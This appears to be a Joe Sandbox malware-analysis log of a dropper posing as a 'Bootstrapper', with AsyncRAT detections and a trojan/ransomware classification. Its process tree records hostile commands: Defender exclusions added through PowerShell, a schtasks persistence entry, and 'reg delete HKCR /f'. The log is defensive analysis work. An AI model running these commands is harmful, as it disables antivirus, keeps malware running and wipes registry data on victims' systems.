                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373AB5340_2_00007FF6373AB534
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B53F00_2_00007FF6373B53F0
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373972880_2_00007FF637397288
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373A126C0_2_00007FF6373A126C
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF63739A3100_2_00007FF63739A310
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF63739C2F00_2_00007FF63739C2F0
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373AF1800_2_00007FF6373AF180
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B21D00_2_00007FF6373B21D0
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373D20800_2_00007FF6373D2080
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373AAF180_2_00007FF6373AAF18
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B2D580_2_00007FF6373B2D58
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C07540_2_00007FF6373C0754
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B8DF40_2_00007FF6373B8DF4
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373ABB900_2_00007FF6373ABB90
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B4B980_2_00007FF6373B4B98
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373A5B600_2_00007FF6373A5B60
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C8C1C0_2_00007FF6373C8C1C
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373CFA940_2_00007FF6373CFA94
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF637391AA40_2_00007FF637391AA4
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B2AB00_2_00007FF6373B2AB0
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373A1A480_2_00007FF6373A1A48
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373D5AF80_2_00007FF6373D5AF8
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373C89A00_2_00007FF6373C89A0
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B39640_2_00007FF6373B3964
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373AC96C0_2_00007FF6373AC96C
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C491A62_2_00007FF848C491A6
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C432E92_2_00007FF848C432E9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C50D0A2_2_00007FF848C50D0A
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C416D92_2_00007FF848C416D9
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C4DE302_2_00007FF848C4DE30
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C49F522_2_00007FF848C49F52
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C4DBC02_2_00007FF848C4DBC0
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C50EB62_2_00007FF848C50EB6
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeCode function: 2_2_00007FF848C420BD2_2_00007FF848C420BD
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C374703_2_00007FF848C37470
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C45D533_2_00007FF848C45D53
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C4250D3_2_00007FF848C4250D
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C48F303_2_00007FF848C48F30
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeCode function: 3_2_00007FF848C342603_2_00007FF848C34260
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeCode function: 8_2_00007FF848C471408_2_00007FF848C47140
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeCode function: 8_2_00007FF848C372708_2_00007FF848C37270
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeCode function: 8_2_00007FF848C373908_2_00007FF848C37390
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeCode function: 8_2_00007FF848C42E2A8_2_00007FF848C42E2A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF848D030E920_2_00007FF848D030E9
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 27_2_00007FF848C416D927_2_00007FF848C416D9
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 27_2_00007FF848C420BD27_2_00007FF848C420BD
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 27_2_00007FF848C40E7827_2_00007FF848C40E78
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 28_2_00007FF848C516D928_2_00007FF848C516D9
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 28_2_00007FF848C520BD28_2_00007FF848C520BD
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 28_2_00007FF848C50E7828_2_00007FF848C50E78
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_00007FF848C216EB29_2_00007FF848C216EB
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_00007FF848C220BD29_2_00007FF848C220BD
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_00007FF848C20E7829_2_00007FF848C20E78
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 30_2_00007FF848C516D930_2_00007FF848C516D9
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 30_2_00007FF848C520BD30_2_00007FF848C520BD
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 30_2_00007FF848C50E7830_2_00007FF848C50E78
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 32_2_00007FF848C316EB32_2_00007FF848C316EB
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 32_2_00007FF848C320BD32_2_00007FF848C320BD
                      Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 32_2_00007FF848C30E7832_2_00007FF848C30E78
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DC629433_2_00007FF789DC6294
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DD09D833_2_00007FF789DD09D8
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DCECE033_2_00007FF789DCECE0
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DBDC4C33_2_00007FF789DBDC4C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DBA8AC33_2_00007FF789DBA8AC
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DD400C33_2_00007FF789DD400C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DB72AC33_2_00007FF789DB72AC
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DCCA3033_2_00007FF789DCCA30
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DE59E033_2_00007FF789DE59E0
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DD400C33_2_00007FF789DD400C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DBB94833_2_00007FF789DBB948
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DBE91C33_2_00007FF789DBE91C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DE551033_2_00007FF789DE5510
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DBB31833_2_00007FF789DBB318
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DBBF0C33_2_00007FF789DBBF0C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DC569C33_2_00007FF789DC569C
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DDBDF833_2_00007FF789DDBDF8
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DDFD1833_2_00007FF789DDFD18
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DDC07433_2_00007FF789DDC074
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DE900833_2_00007FF789DE9008
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeCode function: 33_2_00007FF789DE2F2433_2_00007FF789DE2F24
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeCode function: 34_2_00007FF848C51D8134_2_00007FF848C51D81
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeCode function: 34_2_00007FF848C523D434_2_00007FF848C523D4
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeCode function: 39_2_00000207DE5869B239_2_00000207DE5869B2
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeCode function: 39_2_00000207DE5870DC39_2_00000207DE5870DC
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeCode function: 39_2_00000207DE5869F239_2_00000207DE5869F2
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe 7C4283F5E620B2506BCB273F947DEF4435D95E143AE3067A783FD3ADC873A659
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe EBBCB489171ABFCFCE56554DBAEACD22A15838391CBC7C756DB02995129DEF5A
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 2148
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBootstrapperV22.exe4 vs 8svMXMXNRn.exe
                      Source: 8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E41A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs 8svMXMXNRn.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKCR /f
                      Source: 2.0.BootstrapperV21.exe.750000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: BootstrapperV21.exe.0.dr, 65bWXagIT9MC7apne2lv4JhVNzwdT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: BootstrapperV21.exe.0.dr, SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.csCryptographic APIs: 'TransformFinalBlock'
                      Source: BootstrapperV21.exe.0.dr, SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.csCryptographic APIs: 'TransformFinalBlock'
                      Source: explorer.exe.2.dr, 65bWXagIT9MC7apne2lv4JhVNzwdT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: explorer.exe.2.dr, SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.csCryptographic APIs: 'TransformFinalBlock'
                      Source: explorer.exe.2.dr, SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.BootstrapperV21.exe.1b4c0000.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.BootstrapperV21.exe.1b4c0000.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.BootstrapperV21.exe.1b460000.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.BootstrapperV21.exe.1b460000.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                      Source: BootstrapperV21.exe.0.dr, iE2JG8OyzoUgBKQJy6KnMXFpYrHoU2FZ7MRP4mITsrlhsV9Gt1A6RK4AAqykDpnKsG9wGtnz2w903OpUVP5W4K.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: BootstrapperV21.exe.0.dr, iE2JG8OyzoUgBKQJy6KnMXFpYrHoU2FZ7MRP4mITsrlhsV9Gt1A6RK4AAqykDpnKsG9wGtnz2w903OpUVP5W4K.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: explorer.exe.2.dr, iE2JG8OyzoUgBKQJy6KnMXFpYrHoU2FZ7MRP4mITsrlhsV9Gt1A6RK4AAqykDpnKsG9wGtnz2w903OpUVP5W4K.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: explorer.exe.2.dr, iE2JG8OyzoUgBKQJy6KnMXFpYrHoU2FZ7MRP4mITsrlhsV9Gt1A6RK4AAqykDpnKsG9wGtnz2w903OpUVP5W4K.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@49/237@9/8
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF63739B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF63739B6D8
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeCode function: 0_2_00007FF6373B8624 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF6373B8624
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\explorer.exeMutant created: NULL
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeMutant created: \Sessions\1\BaseNamedObjects\7nc7tjVArvQPrtQg
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6524
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6729546Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                      Source: 8svMXMXNRn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeFile read: C:\Windows\win.iniJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 8svMXMXNRn.exeReversingLabs: Detection: 65%
                      Source: 8svMXMXNRn.exeVirustotal: Detection: 76%
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeFile read: C:\Users\user\Desktop\8svMXMXNRn.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\8svMXMXNRn.exe "C:\Users\user\Desktop\8svMXMXNRn.exe"
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe"
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeProcess created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" --isUpdate true
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 2148
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe "C:\Users\user\AppData\Roaming\explorer.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Users\user\AppData\Local\Temp\voosiq.exe "C:\Users\user\AppData\Local\Temp\voosiq.exe"
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanXD.exe "C:\Users\user\AppData\Local\Temp\TrojanXD.exe"
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k reg delete HKCR /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKCR /f
                      Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe "C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1264
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeProcess created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Users\user\AppData\Local\Temp\voosiq.exe "C:\Users\user\AppData\Local\Temp\voosiq.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe" --oldBootstrapper "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" --isUpdate trueJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeProcess created: C:\Users\user\AppData\Local\Temp\TrojanXD.exe "C:\Users\user\AppData\Local\Temp\TrojanXD.exe"
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k reg delete HKCR /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKCR /f
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: riched20.dllJump to behavior
